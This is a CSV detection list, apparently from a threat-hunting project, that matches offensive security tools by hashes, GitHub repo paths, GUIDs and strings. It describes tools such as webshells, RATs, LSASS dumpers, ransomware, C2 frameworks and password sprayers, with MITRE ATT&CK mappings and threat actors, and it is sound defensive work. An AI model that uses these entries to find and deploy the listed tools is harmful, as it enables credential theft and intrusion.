"*0fd206b046e9a2b542a7a82d4aba38eba6339f813b60c4af451e48aa50bbc78c*",".{0,1000}0fd206b046e9a2b542a7a82d4aba38eba6339f813b60c4af451e48aa50bbc78c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21812"
"*0fd74299abc6f3a23b609351d6fc3e7c524b2e4652a4691ec11c9c6ec1ab48d2*",".{0,1000}0fd74299abc6f3a23b609351d6fc3e7c524b2e4652a4691ec11c9c6ec1ab48d2.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#filehash","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","21814"
"*0fde5da043382f46f04eaa04028fba0d127c20b87b88fbd7966805d5c93307ca*",".{0,1000}0fde5da043382f46f04eaa04028fba0d127c20b87b88fbd7966805d5c93307ca.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21815"
"*0fdef22052732301186410ad11b9b5f63dfed89e9a35f431b5195cc4387ac918*",".{0,1000}0fdef22052732301186410ad11b9b5f63dfed89e9a35f431b5195cc4387ac918.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","21816"
"*0FE0D049-F352-477D-BCCD-ACBF7D4F6F15*",".{0,1000}0FE0D049\-F352\-477D\-BCCD\-ACBF7D4F6F15.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","0","#GUIDproject","N/A","10","","N/A","","","","21818"
"*0fea5161a6fd5c671200cd69364a12d916eaf65f26263dfaa9962cd997d61f84*",".{0,1000}0fea5161a6fd5c671200cd69364a12d916eaf65f26263dfaa9962cd997d61f84.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21822"
"*0ff4c1a9377e072a07cf09f94f8cf6ff423e531aab8a131347ecc5f023797eec*",".{0,1000}0ff4c1a9377e072a07cf09f94f8cf6ff423e531aab8a131347ecc5f023797eec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21823"
"*0vercl0k/udmp-parser*",".{0,1000}0vercl0k\/udmp\-parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","21826"
"*0x00G/NiceRAT*",".{0,1000}0x00G\/NiceRAT.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","21827"
"*0x09AL/DNS-Persist*",".{0,1000}0x09AL\/DNS\-Persist.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","21828"
"*0x09AL/IIS-Raid*",".{0,1000}0x09AL\/IIS\-Raid.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","21829"
"*0x09AL/RdpThief*",".{0,1000}0x09AL\/RdpThief.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","21830"
"*0x4d, 0x44, 0x4d, 0x50, 0x93, 0xa7, 0x00, 0x00*",".{0,1000}0x4d,\s0x44,\s0x4d,\s0x50,\s0x93,\s0xa7,\s0x00,\s0x00.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","21831"
"*0x4d, 0x44, 0x4d, 0x50, 0x93, 0xa7, 0x00, 0x00*",".{0,1000}0x4d,\s0x44,\s0x4d,\s0x50,\s0x93,\s0xa7,\s0x00,\s0x00.{0,1000}","offensive_tool_keyword","nanodump","nanodump string minidump","T1003 - T1055.011 - T1148","TA0006","N/A","Dispossessor","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","21832"
"*0x4xel/Bat-Potato*",".{0,1000}0x4xel\/Bat\-Potato.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","1","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","21833"
"*0x727/MetasploitCoop_0x727*",".{0,1000}0x727\/MetasploitCoop_0x727.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","1","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","21834"
"*0x727/MetasploitCoop-Backend*",".{0,1000}0x727\/MetasploitCoop\-Backend.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","21835"
"*0x727/MetasploitCoop-Frontend*",".{0,1000}0x727\/MetasploitCoop\-Frontend.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Frontend","1","1","N/A","N/A","10","10","20","7","2024-04-03T14:49:19Z","2021-08-17T10:36:52Z","21836"
"*0x727/SchTask_0x727*",".{0,1000}0x727\/SchTask_0x727.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","21837"
"*0x727team@gmail.com*",".{0,1000}0x727team\@gmail\.com.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#email","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21838"
"*0x9999997B3deF7b69c09D7a9CA65E5242fb04a764*",".{0,1000}0x9999997B3deF7b69c09D7a9CA65E5242fb04a764.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","21839"
"*0xB455/m365-fatigue*",".{0,1000}0xB455\/m365\-fatigue.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","1","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","21840"
"*0xbadjuju/Tokenvator*",".{0,1000}0xbadjuju\/Tokenvator.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","21841"
"*0xbadjuju/WheresMyImplant*",".{0,1000}0xbadjuju\/WheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","21842"
"*0xbdg/hidden-tear-remake*",".{0,1000}0xbdg\/hidden\-tear\-remake.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","21843"
"*0xdarkvortex-MalwareDevelopment*",".{0,1000}0xdarkvortex\-MalwareDevelopment.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","N/A","10","10","193","66","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z","21844"
"*0xdea/blindsight*",".{0,1000}0xdea\/blindsight.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","1","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","21845"
"*0xdeadbeef*",".{0,1000}0xdeadbeef.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","21846"
"*0xEr3bus/PoolPartyBof*",".{0,1000}0xEr3bus\/PoolPartyBof.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","21847"
"*0xEr3bus/PoolPartyBof*",".{0,1000}0xEr3bus\/PoolPartyBof.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","21848"
"*0xEr3bus/RdpStrike*",".{0,1000}0xEr3bus\/RdpStrike.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","1","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","21849"
"*0xHossam/Killer*",".{0,1000}0xHossam\/Killer.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","21850"
"*0xIslamTaha/Python-Rootkit*",".{0,1000}0xIslamTaha\/Python\-Rootkit.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","21851"
"*0xless/slip*",".{0,1000}0xless\/slip.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","1","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","21852"
"*0xsp-SRD/MDE_Enum*",".{0,1000}0xsp\-SRD\/MDE_Enum.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","1","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","21853"
"*0xsp-SRD/mortar*",".{0,1000}0xsp\-SRD\/mortar.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","21854"
"*0xsp-SRD/mortar*",".{0,1000}0xsp\-SRD\/mortar.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","21855"
"*0xthirteen/Carseat*",".{0,1000}0xthirteen\/Carseat.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","1","N/A","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","21856"
"*0xthirteen/MoveKit*",".{0,1000}0xthirteen\/MoveKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","21857"
"*0xthirteen/PerfExec*",".{0,1000}0xthirteen\/PerfExec.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","1","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","21858"
"*0xthirteen/SharpMove*",".{0,1000}0xthirteen\/SharpMove.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","1","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","21859"
"*0xthirteen/SharpRDP*",".{0,1000}0xthirteen\/SharpRDP.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","21860"
"*0xthirteen/SharpStay*",".{0,1000}0xthirteen\/SharpStay.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","21861"
"*0xthirteen/StayKit*",".{0,1000}0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","21862"
"*0xtosh/dnskire*",".{0,1000}0xtosh\/dnskire.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","21863"
"*0xZDH/o365spray*",".{0,1000}0xZDH\/o365spray.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","1","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","21864"
"*0xZDH/Omnispray*",".{0,1000}0xZDH\/Omnispray.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","21865"
"*0xZDH\Omnispray*",".{0,1000}0xZDH\\Omnispray.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","21866"
"*1$a$$ Dl_lmp in *",".{0,1000}1\$a\$\$\sDl_lmp\sin\s.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","21867"
"*'1. Set the backdoor'*",".{0,1000}\'1\.\sSet\sthe\sbackdoor\'.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","21868"
"*1_FindDomain.sh*",".{0,1000}1_FindDomain\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","21869"
"*1004ed17f2164c6dd249f7d640e8c8250e6c47d9e4d2c8748becb05591a8539b*",".{0,1000}1004ed17f2164c6dd249f7d640e8c8250e6c47d9e4d2c8748becb05591a8539b.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","#filehash","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","21870"
"*1006275da2fa2271887b43047f3c81b8525866abe2e2f239e9f2cbde41de484e*",".{0,1000}1006275da2fa2271887b43047f3c81b8525866abe2e2f239e9f2cbde41de484e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21871"
"*1008626761b65900ab77833ff6a2a3e2a4d8a7a4eab1e956d477d951f1edd28e*",".{0,1000}1008626761b65900ab77833ff6a2a3e2a4d8a7a4eab1e956d477d951f1edd28e.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","21872"
"*10119f906ce65acf48767f222524685945f3c25e8531bad35ad485c6e549ccc1*",".{0,1000}10119f906ce65acf48767f222524685945f3c25e8531bad35ad485c6e549ccc1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21873"
"*1013cf05122064ab1bf61f1d89f17482f2c6d6990b6ae29b33b6fc6a4882d286*",".{0,1000}1013cf05122064ab1bf61f1d89f17482f2c6d6990b6ae29b33b6fc6a4882d286.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21874"
"*101ce1b9d0a8f8870b287bdc3308e443d3995cec57162678d83772df947a5ad4*",".{0,1000}101ce1b9d0a8f8870b287bdc3308e443d3995cec57162678d83772df947a5ad4.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","21876"
